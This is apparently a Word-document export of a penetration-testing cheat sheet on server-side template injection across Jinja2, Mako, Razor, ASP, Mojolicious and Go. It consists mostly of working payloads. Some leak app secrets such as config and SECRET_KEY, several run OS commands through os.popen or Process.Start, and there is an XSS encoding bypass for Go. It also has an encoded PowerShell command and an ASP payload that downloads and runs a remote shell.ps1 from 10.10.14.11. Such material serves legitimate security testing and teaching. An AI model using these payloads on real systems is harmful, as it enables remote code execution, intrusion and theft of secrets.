    <w:p w14:paraId="7A32FEF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{% import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os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%}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116CCEC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1645A23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{% import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os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%}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086C6CA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4291DCC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70CF6D0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60974C6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275A428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4CB67F8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os.system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whoami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')}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1047DD2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os.system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('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whoami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')}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFCCD7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lastRenderedPageBreak/>
        <w:t>More information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1063C220" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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50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https://ajinabraham.com/blog/server-side-template-injection-in-tornado</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5E1B025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Jinja2 (Python)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D34BC3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51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Official website</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7B2534D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0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Jinja2 is a full featured template engine for Python. It has full </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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unicode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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support, an optional integrated sandboxed execution environment, widely used and BSD licensed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D68F20C" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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{{7*7}} = Error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1A9D63" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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${7*7} = ${7*7}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E14AF6F" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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foobar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}} Nothing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9B38AC" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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{{4*4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}}[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[5*5]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDA085C" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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{{7*'7'}} = 7777777</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7F7E39" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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{{config}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681A3183" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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config.items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()}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEA6281" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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settings.SECRET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_KEY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}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD1C8A0" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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{{settings}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240A9332" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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&lt;div data-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gb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-custom-block data-tag="debug"&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BD9C63" w14:textId="4D87537D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392556C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{% debug %}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687F282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713500F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1971F90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446BC63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75A097D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2CEE7EE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settings.SECRET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_KEY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}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548755B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{{4*4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}}[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[5*5]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F0E3C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{{7*'7'}} would result in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7777777</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="425EA13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Jinja2 - Template format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435B4146" w14:textId="5D6ACFEF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1EE3FE2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{% extends "layout.html" %}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9A3BA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{% block body %}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EFE19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&lt;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ul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4BAF43B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{% for user in users %}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC58AB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&lt;li&gt;&lt;a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href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="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 user.url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}}"&gt;{{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user.username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}}&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E68448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{%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endfor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%}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411A075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&lt;/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ul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1E99ABE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{%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endblock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%}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0865192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2982012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52" w:history="1">
        <w:r w:rsidRPr="002E3993">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
            <w:lang w:eastAsia="en-IN"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>RCE not dependant from</w:t>
        </w:r>
      </w:hyperlink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__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builtins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__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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B71DEF2" w14:textId="5B4682D7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5A82DE3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 self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._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6993472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 self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._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521CBFD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 self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._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F76DF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3641BF8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# Or in the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shotest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versions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135D2CA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 cycler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.__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init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__.__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globals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__.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os.popen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('id').read() }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7886EC9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 joiner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.__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init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__.__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globals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__.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os.popen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('id').read() }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B303D1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{{ namespace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.__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init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__.__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globals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__.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os.popen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('id').read() }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A49783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details about how to abuse Jinja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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295555AE" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E39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3" w:history="1">
        <w:r w:rsidRPr="002E3993">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:caps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PAGE</w:t>
        </w:r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Jinja2 SSTI</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="49C4CCE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Other payloads in </w:t>
      </w:r>
      <w:hyperlink r:id="rId54" w:anchor="jinja2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https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1DF67C5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Mako (Python)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140CB9B9" w14:textId="6399FB7F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473DB6D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&lt;%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259B23C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import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os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4BB8577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x=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os.popen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('id').read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FF753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%&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583FF5A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${x}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BEDBB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information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFF8DC3" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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55" w:anchor="mako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https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#mako</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="32EE57F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Razor (.Net)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB18EAC" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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@(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2+2) &lt;= Success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BB448F" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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@(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 &lt;= Success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25420754" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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@("{{code}}") &lt;= Success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711FF223" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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lastRenderedPageBreak/>
        <w:t>@ &lt;=Success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719913A3" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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@{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 &lt;= ERROR!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189335D9" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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@{ &lt;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 ERRROR!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62859362" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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@(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1+2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3973F05E" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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@( /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C#Code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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD910DA" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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@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System.Diagnostics.Process.Start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("cmd.exe","/c echo RCE &gt; C:/Windows/Tasks/test.txt");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356858B5" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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@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System.Diagnostics.Process.Start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("cmd.exe","/c powershell.exe -enc IABpAHcAcgAgAC0AdQByAGkAIABoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAyAC4AMQAxADEALwB0AGUAcwB0AG0AZQB0ADYANAAuAGUAeABlACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAYQBzAGsAcwBcAHQAZQBzAHQAbQBlAHQANgA0AC4AZQB4AGUAOwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXAB0AGUAcwB0AG0AZQB0ADYANAAuAGUAeABlAA==");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1FE59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The .NET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System.Diagnostics.Process.Start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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method can be used to start any process on the server and thus create a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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. You can find a vulnerable webapp example in </w:t>
      </w:r>
      <w:hyperlink r:id="rId56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https://github.com/cnotin/RazorVulnerableApp</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="05B83A9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information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AC46DD" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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57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https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="772752DD" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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58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https://www.schtech.co.uk/razor-pages-ssti-rce/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3AA2EC8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ASP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17590E2D" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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&lt;%= 7*7 %&gt;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= 49</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8195FC" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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&lt;%= "foo" %&gt;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= foo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C63C2E1" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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&lt;%= foo %&gt;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= Nothing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3825E0" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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&lt;%=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response.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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(date()) %&gt;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= &lt;Date&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5711F10B" w14:textId="593C8EAA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665917C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&lt;%= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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CreateObject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Wscript.Shell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").exec("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powershell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IEX(New-Object Net.WebClient).downloadString('http://10.10.14.11:8000/shell.ps1')").StdOut.ReadAll() %&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F1EC8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Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160C02F0" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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59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https://www.w3schools.com/asp/asp_examples.asp</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="65D9696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Mojolicious</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> (Perl)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60ACCE49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Even if it's </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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perl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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it uses tags like ERB in Ruby.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60729FC2" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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&lt;%= 7*7 %&gt; = 49</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2867BC21" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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&lt;%=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foobar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%&gt; = Error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA911FC" w14:textId="5EC0AFE4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2723BBC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&lt;%=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perl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code %&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E782D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&lt;%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perl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code %&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C93E2E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lastRenderedPageBreak/>
        <w:t>SSTI in GO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00757000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In Go's template engine, confirmation of its usage can be done with specific payloads:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345651A5" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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 .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}}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: Reveals the data structure input. For instance, if an object with a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Password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attribute is passed,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 .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Password }}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could expose it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E86EFC5" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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printf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"%s" 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ssti</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 }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: Expected to display the string "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ssti</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A95330" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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{{html 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ssti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"}}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,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js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"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ssti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"}}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: These payloads should return "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ssti</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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" without appending "html" or "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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". Further directives can be explored in the Go documentation </w:t>
      </w:r>
      <w:hyperlink r:id="rId60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here</w:t>
        </w:r>
      </w:hyperlink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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE928FB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XSS Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED62F8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With the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text/template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package, XSS can be straightforward by inserting the payload directly. Contrastingly, the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html/template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package encodes the response to prevent this (e.g.,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{{"&lt;script&gt;alert(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1)&lt;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/script&gt;"}}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results in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&amp;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lt;script&amp;gt;alert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(1)&amp;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lt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;/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script&amp;gt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;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). Nonetheless, template definition and invocation in Go can bypass this encoding: {{define "T1"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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}}alert</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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(1){{end}} {{template "T1"}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E92753" w14:textId="31153858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vbnet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3096959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RCE Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF56DB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RCE exploitation differs significantly between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html/template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and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text/template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. The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text/template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module allows calling any public function directly (using the “call” value), which is not permitted in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html/template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. Documentation for these modules is available </w:t>
      </w:r>
      <w:hyperlink r:id="rId61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here for html/template</w:t>
        </w:r>
      </w:hyperlink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and </w:t>
      </w:r>
      <w:hyperlink r:id="rId62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here for text/template</w:t>
        </w:r>
      </w:hyperlink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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317DDCBE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For RCE via SSTI in Go, object methods can be invoked. For example, if the provided object has a </w:t>
      </w:r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System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method executing commands, it can be exploited like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{{ .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System "ls" }}</w:t>
      </w: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 Accessing the source code is usually necessary to exploit this, as in the given example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448A3CC4" w14:textId="4B010A81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0649F995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func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(p Person) Secret (test string) string {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF87C74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ab/>
        <w:t xml:space="preserve">out, </w:t>
      </w:r>
      <w:proofErr w:type="gram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_ :</w:t>
      </w:r>
      <w:proofErr w:type="gram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= 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exec.Command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(test).</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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CombinedOutput</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCB583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ab/>
        <w:t>return string(out)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D04FDC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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4389224C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More information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF59772" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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63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https://blog.takemyhand.xyz/2020/05/ssti-breaking-gos-template-engine-to.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2EBFE873" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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64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https://www.onsecurity.io/blog/go-ssti-method-research/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="13455D52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More Exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6719C896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Check the rest of </w:t>
      </w:r>
      <w:hyperlink r:id="rId65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https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection</w:t>
        </w:r>
      </w:hyperlink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for more exploits. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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Also</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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you can find interesting tags information in </w:t>
      </w:r>
      <w:hyperlink r:id="rId66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https://github.com/DiogoMRSilva/websitesVulnerableToSSTI</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="63310C5D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</w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E3993"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  <w:t>BlackHat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E3993"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  <w:t xml:space="preserve"> PDF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB43EDF" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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bdr w:val="single" w:sz="6" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E39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2E39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"https://129538173-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2Fgit-blob-9eacd65568add9f7940b211234f677a2379af069%2FEN-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-BlackHat-15.pdf?alt=media"</w:instrText>
      </w:r>
      <w:r w:rsidRPr="002E39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2E39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7CDCF136" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E39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993"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bdr w:val="single" w:sz="6" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>2MB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431E9CBA" w14:textId="77777777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bdr w:val="single" w:sz="6" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E3993"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bdr w:val="single" w:sz="6" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>EN-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-BlackHat-15.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086F6C02" w14:textId="77777777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bdr w:val="single" w:sz="6" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E3993"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bdr w:val="single" w:sz="6" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358F3370" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E39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9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1B517B1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  <w:t>Related Help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5AD07F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2E399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If you think it could be useful, read:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FD60E4" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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67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Flask tricks</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="747AF2FA" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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68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Python magic functions</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2BC84D18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  <w:t>Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E425754" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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69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https://github.com/Hackmanit/TInjA</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="121D018B" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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70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https://github.com/vladko312/sstimap</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7DD0E4AB" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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71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https://github.com/epinna/tplmap</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="51E176A5" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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72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https://github.com/Hackmanit/template-injection-table</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="519181F7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  <w:t>Brute-Force Detection List</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5633BB65" w14:textId="5512E6C6" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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73" w:history="1">
        <w:proofErr w:type="spellStart"/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Auto_Wordlists</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/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/ssti.txt at main · </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/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carlospolop</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/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/</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/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Auto_WordlistsGitHub</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="19A8E34A" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E39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</w:pPr>
      <w:r w:rsidRPr="002E3993"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  <w:t>Practice &amp; References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F24604D" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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74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https://portswigger.net/web-security/server-side-template-injection/exploiting</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="318F62AF" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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75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https://github.com/DiogoMRSilva/websitesVulnerableToSSTI</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="64C99F06" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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76" w:history="1">
        <w:r w:rsidRPr="002E3993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https://portswigger.net/web-security/server-side-template-injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7D3ABC3F" w14:textId="77777777" w:rsidR="00240D72" w:rsidRDefault="00240D72"/>
    <w:sectPr w:rsidR="00240D72">
      <w:footerReference w:type="even" r:id="rId77"/>
      <w:footerReference w:type="default" r:id="rId78"/>
      <w:footerReference w:type="first" r:id="rId7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8C09" w14:textId="77777777" w:rsidR="007507D8" w:rsidRDefault="007507D8" w:rsidP="002E3993">
      <w:pPr>
